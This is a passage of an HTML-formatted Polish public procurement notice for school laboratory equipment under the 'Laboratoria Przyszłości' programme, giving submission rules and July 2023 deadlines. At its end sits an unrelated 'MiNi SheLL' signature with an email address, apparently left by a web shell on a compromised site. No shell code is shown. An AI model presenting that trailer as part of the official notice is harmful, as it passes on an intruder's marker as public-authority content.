odniesieniu do podmiotów udostępniających zasoby. <br/>5.	Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy zamieszczonych w załącznikach do SWZ, powinny być sporządzone zgodnie z tymi wzorami, co do treści oraz opisu kolumn i wierszy.<br/>6.	Ofertę należy sporządzić w języku polskim.<br/>7.	Ofertę składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w treści formularza ofertowego (pkt 8) składają<br/>oświadczenie, z którego wynika, które dostawy / usługi wykonają poszczególni wykonawcy.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres zmian przewiduje zał. nr 4a-4g <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:https://platformazakupowa.pl/transakcja/790932</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-17 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przedmiotowe zamówienie będzie elementem projektu realizowanego przez Zamawiającego pn. „Laboratoria Przyszłości”, współfinansowanego ze Środków Funduszu Przeciwdziałania COVID-19 i przeznaczonego na wsparcie jednostek samorządu terytorialnego w realizacji inwestycyjnych zadań polegających na rozwijaniu szkolnej infrastruktury we współpracy Ministerstwa Edukacji i Nauki z Centrum GovTech w Kancelarii Prezesa Rady Ministrów

Creat By MiNi SheLL
Email: jattceo@gmail.com